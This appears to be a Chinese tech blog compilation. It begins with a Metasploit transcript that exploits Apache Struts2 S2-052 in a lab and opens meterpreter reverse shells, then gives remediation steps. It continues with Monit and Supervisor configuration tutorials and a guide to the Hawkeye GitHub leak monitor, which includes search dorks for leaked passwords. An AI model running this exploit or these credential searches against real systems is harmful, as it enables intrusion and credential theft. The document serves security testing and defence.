msf exploit(struts2_rest_xstream) > set lhost 172.16.100.177
lhost => 172.16.100.177

msf exploit(struts2_rest_xstream) > show options

Module options (exploit/multi/http/struts2_rest_xstream):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.16.100.155                   yes       The target address
   RPORT      8080                             yes       The target port (TCP)
   SRVHOST    0.0.0.0                          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                             yes       The local port to listen on.
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase/orders/3  yes       Path to Struts app
   URIPATH                                     no        The URI to use for this exploit (default is random)
   VHOST                                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.100.177   yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Apache Struts 2.5 - 2.5.12

msf exploit(struts2_rest_xstream) > exploit 

[*] Started HTTPS reverse handler on https://172.16.100.177:8443
[*] Using URL: http://0.0.0.0:8080/tD86RKaLdwV
[*] Local IP: http://172.16.100.177:8080/tD86RKaLdwV
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(struts2_rest_xstream) > exploit 

[*] Started HTTPS reverse handler on https://172.16.100.177:8443
[*] Using URL: http://0.0.0.0:8080/CFpeUWr3UO3b7s5
[*] Local IP: http://172.16.100.177:8080/CFpeUWr3UO3b7s5
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Redirecting stageless connection from /rw7AbVJ4D8RcPFo-BYSmjA9L-dN7OPSB7NnI1R5R97ZHeZ8zC6CFm7WTV9KBp4CWjTHPZ2nnj_9tLmcClEo3QwMO8YXRdG4HGoLfAcOWNx43fBFbD with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.16.100.177:8443 -> 172.16.100.155:58051) at 2017-09-13 17:32:56 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Redirecting stageless connection from /hkiZkZ_fW9LcAdoDhbknRgM_qsJFpQYWAWkJT5Qjt8QVFopVe0ypSG-eoVv9eKJp5I_n0ZKxaKy66ZT with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (172.16.100.177:8443 -> 172.16.100.155:53330) at 2017-09-13 17:33:04 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command Stager progress - 100.00% done (122/122 bytes)
[*] Server stopped.

meterpreter > sysinfo 
Computer     : 172.16.100.155
OS           : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter  : x64/linux

修复建议:
1.官方建议设置插件处理的数据类型限定为json
<constant name=”struts.action.extension” value=”xhtml,,json” />
2.升级Struts到2.5.13版本或2.3.34版本
3.在XStreamHandler中进行数据校验或检查

参考文章:
http://bobao.360.cn/learning/detail/4372.html
https://github.com/jas502n/St2-052

开源的轻量级监控工具Monit

monit和supervisor都是进程管理工具,不过进程管理只是monit的功能之一,monit是一个开源的轻量级监控工具,功能十分强大。可以从多个层面进行监控,可以自动维护进程,发送邮件报警等。

系统监控:进程状态,系统负载,cpu负载,内存占用等。
进程监控:monit可以监控守护进程,当被监控进程异常退出时,可以自动被拉起。
文件系统:Monit可以监控本地文件、目录、文件系统的变化,包括时间戳、校验值、大小的变化。例如,可以监控文件sha1以及md5的值,来监控文件是否发生变化
网络监控:monit可以监控网络连接,支持TCP、UDP、Unix domain sockets以及HTTP、SMTP等。

程序安装:
yum install monit -y
配置文件:/etc/monit.conf

常用命令:

monit -t # 配置文件检测
monit # 启动monit daemon
monit -c /var/monit/monitrc # 启动monit daemon时指定配置文件
monit reload # 当更新了配置文件需要重载
monit status # 查看所有服务状态
monit status nginx # 查看nginx服务状态
monit stop all # 停止所有服务
monit stop nginx # 停止nginx服务
monit start all # 启动所有服务
monit start nginx # 启动nginx服务
monit -V # 查看版本

配置告警联系人
set alert 776711462@qq.com
下面是常用的几个功能:
1)监控文件
Nginx的配置文件HASH变化则直接reload

check file nginx.conf path /usr/local/nginx/conf/nginx.conf
    if changed sha1 checksum
    then exec "/usr/local/nginx/sbin/nginx -s reload"

这里也可以指定HASH值

check file nginx.conf path /usr/local/nginx/conf/nginx.conf
    if failed checksum and expect the sum 144f738eee9c0c0bb0b1e62c785e4a76 then alert

监控文件的修改时间,比如DB文件如果15分钟没有修改可能系统服务出现问题。监控文件的权限、属主、属组、大小等。

check file database with path /data/mydatabase.db
    if failed permission 700 then alert
    if failed uid data then alert
    if failed gid data then alert
    if timestamp > 15 minutes then alert
    if size > 100 MB then exec "/my/cleanup/script" as uid dba and gid dba

2)监控进程
监控Nginx进程:

# 提供主进程pid文件
check process nginx with pidfile /usr/local/nginx/logs/nginx.pid
    # 进程启动命令,必须写绝对路径
    start program = "/usr/local/nginx/sbin/nginx" with timeout 30 seconds
    # 进程关闭命令
    stop program  = "/usr/local/nginx/sbin/nginx -s stop"
# 端口状态检测,当状态返回异常,则重启服务。
  if failed host 192.168.192.120 port 80 protocol http then restart
# 当端口状态异常,报警    
  if failed host 192.168.192.120 port 80 protocol http then alert
# 在5个监视周期中,重启了服务3次,则超时不再监视。 因为如果重启了多次不成功,很有可能继续重启下去也不会成功,避免一直无效的重启,白白消耗系统资源影响主机上其他进程的工作,这时应该通知人工处理。
  if 3 restarts within 5 cycles then timeout
# 如果在5个监视周期内,该服务的CPU使用率都超过90%则告警。       
  if cpu usage > 90% for 5 cycles then alert
# 设置分组,可选
   group server
#   可选的ssl端口的监控,如果有的话
#    if failed port 443 type tcpssl protocol http
#       with timeout 15 seconds
#       then restart

监控SSH进程:

check process sshd with pidfile /var/run/sshd.pid
   start program  "/etc/init.d/sshd start"
   stop program  "/etc/init.d/sshd stop"
   if failed port 22 protocol SSH then restart
   if 5 restarts within 5 cycles then timeout

监控apache进程:

  check process apache with pidfile /usr/local/apache/logs/httpd.pid
    start program = "/etc/init.d/httpd start" with timeout 60 seconds
    stop program  = "/etc/init.d/httpd stop"
    if cpu > 60% for 2 cycles then alert
    if cpu > 80% for 5 cycles then restart
    if totalmem > 200.0 MB for 5 cycles then restart
    if children > 250 then restart
    if loadavg(5min) greater than 10 for 8 cycles then stop
    if failed host www.tildeslash.com port 80 protocol http and request "/somefile.html" then restart
    if failed port 443 type tcpssl protocol http with timeout 15 seconds then restart
    if 3 restarts within 5 cycles then unmonitor
    depends on apache_bin
    group server

3)系统负载监控

  check system $HOST
    if loadavg (1min) > 4 then alert
    if loadavg (5min) > 2 then alert
    if cpu usage > 95% for 10 cycles then alert
    if memory usage > 75% then alert
    if swap usage > 25% then alert

4)监控脚本返回值

check program myscript with path /usr/local/bin/myscript.sh
    if status != 0 then alert

5)监控网卡状态

  check network public with interface eth0
    if failed link then alert
    if changed link then alert
    if saturation > 90% then alert
    if download > 10 MB/s then alert
    if total upload > 1 GB in last hour then alert

6)监控远程主机服务

通过发出ping测试来检查远程主机的可用性,并检查来自web服务器的响应的内容。

  check host myserver with address 192.168.192.120
    if failed ping then alert
    if failed port 3306 protocol mysql with timeout 15 seconds then alert
    if failed port 80 protocol http and request /1.html with content = "123" then alert

7)监控文件系统

check filesystem datafs with path /dev/sdb1
 start program = "/bin/mount /data"
 stop program = "/bin/umount /data"
 if failed permission 660 then unmonitor
 if failed uid root then unmonitor
 if failed gid disk then unmonitor
 if space usage > 80% for 5 times within 15 cycles then alert
 if space usage > 99% then stop
 if inode usage > 30000 then alert
 if inode usage > 99% then stop
 group server

 

进程管理工具supervisor

Supervisor是用Python开发的一个client/server服务,是Linux/Unix系统下的一个进程管理工具,不支持Windows系统。它可以很方便的监听、启动、停止、重启一个或多个进程。用Supervisor管理的进程,当一个进程意外被杀死,supervisort监听到进程死后,会自动将它重新拉起,很方便的做到进程自动恢复的功能,不再需要自己写shell脚本来控制。

安装supervisor
pip install supervisor

通过运行echo_supervisord_conf程序生成supervisor的初始化配置文件
echo_supervisord_conf > /etc/supervisor/supervisord.conf

supervisor的配置参数较多,下面介绍一下常用的参数配置,详细的配置及说明,分号(;)开头的配置表示注释。

[unix_http_server]
file=/tmp/supervisor.sock   ;UNIX socket 文件,supervisorctl 会使用
;chmod=0700                 ;socket文件的mode,默认是0700
;chown=nobody:nogroup       ;socket文件的owner,格式:uid:gid

;[inet_http_server]         ;HTTP服务器,提供web管理界面
;port=127.0.0.1:9001        ;Web管理后台运行的IP和端口,如果开放到公网,需要注意安全性
;username=user              ;登录管理后台的用户名
;password=123               ;登录管理后台的密码

[supervisord]
logfile=/tmp/supervisord.log ;日志文件,默认是 $CWD/supervisord.log
logfile_maxbytes=50MB        ;日志文件大小,超出会rotate,默认 50MB,如果设成0,表示不限制大小
logfile_backups=10           ;日志文件保留备份数量默认10,设为0表示不备份
loglevel=info                ;日志级别,默认info,其它: debug,warn,trace
pidfile=/tmp/supervisord.pid ;pid 文件
nodaemon=false               ;是否在前台启动,默认是false,即以 daemon 的方式启动
minfds=1024                  ;可以打开的文件描述符的最小值,默认 1024
minprocs=200                 ;可以打开的进程数的最小值,默认 200

[supervisorctl]
serverurl=unix:///tmp/supervisor.sock ;通过UNIX socket连接supervisord,路径与unix_http_server部分的file一致
;serverurl=http://127.0.0.1:9001 ; 通过HTTP的方式连接supervisord

; [program:xx]是被管理的进程配置参数,xx是进程的名称
[program:xx]
command=/opt/apache-tomcat-8.0.35/bin/catalina.sh run  ; 程序启动命令
autostart=true       ; 在supervisord启动的时候也自动启动
startsecs=10         ; 启动10秒后没有异常退出,就表示进程正常启动了,默认为1秒
autorestart=true     ; 程序退出后自动重启,可选值:[unexpected,true,false],默认为unexpected,表示进程意外杀死后才重启
startretries=3       ; 启动失败自动重试次数,默认是3
user=tomcat          ; 用哪个用户启动进程,默认是root
priority=999         ; 进程启动优先级,默认999,值小的优先启动
redirect_stderr=true ; 把stderr重定向到stdout,默认false
stdout_logfile_maxbytes=20MB  ; stdout 日志文件大小,默认50MB
stdout_logfile_backups = 20   ; stdout 日志文件备份数,默认是10
; stdout 日志文件,需要注意当指定目录不存在时无法正常启动,所以需要手动创建目录(supervisord 会自动创建日志文件)
stdout_logfile=/opt/apache-tomcat-8.0.35/logs/catalina.out
stopasgroup=false     ;默认为false,进程被杀死时,是否向这个进程组发送stop信号,包括子进程
killasgroup=false     ;默认为false,向进程组发送kill信号,包括子进程

;包含其它配置文件
[include]
files = relative/directory/*.ini    ;可以指定一个或多个以.ini结束的配置文件

下面是一个监控Jboss进程的例子:

[program:jboss]
command=/web/webserver/jboss/anquan2/bin/catalina.sh run
stdout_logfile=/web/webserver/jboss/anquan2/logs/catalina.out
autostart=true
autorestart=true
startsecs=5
priority=1
stopasgroup=true
killasgroup=true

启动supervisor
supervisord -c /etc/supervisor/supervisord.conf

控制进程
1)交互终端
supervisord启动成功后,可以通过supervisorctl客户端控制进程,启动、停止、重启。运行supervisorctl命令,不加参数,会进入supervisor客户端的交互终端,并会列出当前所管理的所有进程。

[root@server144 logs]# supervisorctl 
jboss                            RUNNING   pid 6949, uptime 0:01:02
supervisor> stop jboss 
jboss: stopped

2)bash终端

[root@server144 logs]# supervisorctl status
jboss                            RUNNING   pid 7018, uptime 0:00:35
[root@server144 logs]# supervisorctl start jboss
jboss: started

3)Web界面

PS:
Supervisor只能管理非daemon的进程,也就是说Supervisor不能管理守护进程。否则提示Exited too quickly (process log may have details)异常。

 

GitHub泄露监控系统Hawkeye

Github作为渗透测试中较为常用的打开突破口的点,由员工安全意识不足导致的敏感信息泄露,例如运维人员上传的脚本中有个人Mail邮箱账号密码,登陆后可以导出通信录继续暴力爆破,然后导出邮件内容搜索VPN等关键字获取一些关键信息。
Github的搜索可以自由组合一些关键字,例如:

"test.com" "smtp"
"test.com" "mail"
"test.com" "mysql"
"test.com" "jdbc"
"test.com" "svn"
"test.com" "pop"
"test.com" "ftp"

"test.com" "user"
"test.com" "username"
"test.com" "账号"

"test.com" "password"
"test.com" "passwd"
"test.com" "pwd"
"test.com" "pass"
"test.com" "密码"

"test.com" "内部"

推荐的一套GitHub泄露监控系统,地址:

https://github.com/0xbug/Hawkeye

克隆项目到本地

git clone https://github.com/0xbug/Hawkeye.git --depth 1

安装依赖 (修改/usr/local/bin/python3 为你系统的Python 3 路径)

cd Hawkeye
pip install virtualenv
virtualenv --python=/usr/local/bin/python3 venv
source venv/bin/activate
pip install -r deploy/requirements.txt

配置文件

cp config.ini.example config.ini
vim config.ini

github 帐户配置

[GitHub]
USERNAME = 帐号
PASSWORD = 密码

MongoDB 认证配置

yum install mongodb
/usr/local/mongodb/bin/mongod -dbpath=/usr/local/mongodb/data -logpath=/usr/local/mongodb/logs
> use Hawkeye
switched to db Hawkeye
> db.addUser("git","hehe123")
{
	"user" : "git",
	"readOnly" : false,
	"pwd" : "2cb2f4cc98430db51a2335446fa84930",
	"_id" : ObjectId("59accc87fff25e9f045afc45")
}

[MongoDB]
HOST = localhost
PORT = 27017
ACCOUNT = git
PASSWORD = hehe123

告警配置(ENABLE:是否开启告警功能)

[Notice]
ENABLE = 1
MAIL_SERVER = 邮件服务器
MAIL_PORT = smtp端口
FROM = 发件人
PASSWORD = 密码

python Hawkeye.py
然后访问 http://0.0.0.0:5000/ 进行关键词、告警、黑名单、定时任务配置